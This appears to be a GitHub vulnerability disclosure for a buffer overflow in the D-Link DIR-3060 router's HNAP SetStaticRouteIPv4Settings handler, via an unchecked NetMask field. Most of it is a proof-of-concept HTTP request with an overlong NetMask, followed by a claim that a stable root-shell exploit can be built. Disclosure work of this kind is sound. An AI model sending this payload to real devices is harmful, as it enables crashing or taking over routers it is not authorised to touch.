Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

D-Link DIR3060A1_FW111B04.bin Overflow vulnerability

Overview

DIR-3060 prog.cgi Keyword api SetStaticRouteIPv4Settings.Overflow vulnerability exists

Vulnerability details

IVar3 parameter obtains NetMask value

Function FUN_ 0049ac18(), call parameter iVar3

The function directly copies the value of iVar3 to local_ 5c, and the length is not verified, which is prone to overflow vulnerability.

POC

  1. Attack with the following POC attacks
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:7018
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/xml
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetNetworkSettings"
HNAP_AUTH: 3C5A4B9EECED160285AAE8D34D8CBA43 1649125990491
Content-Length: 632
Origin: http://192.168.0.1:7018
Connection: close
Referer: http://192.168.0.1:7018/Network.html
Cookie: SESSION_ID=2:1556825615:2; uid=TFKV4ftJ

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetStaticRouteIPv4Settings>
			<StaticRouteIPv4Data>
				<SRIPv4Info>
				<Enabled>true</Enabled>
				<Name></Name>
				<IPAddress>192.168.0.1</IPAddress>
				<NetMask>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
          aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</NetMask>
				<Gateway>192.168.0.254</Gateway>
				<Metric></Metric>
				<Interface></Interface>
				</SRIPv4Info>
			</StaticRouteIPv4Data>
		</SetStaticRouteIPv4Settings>
	</soap:Body>
</soap:Envelope>

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell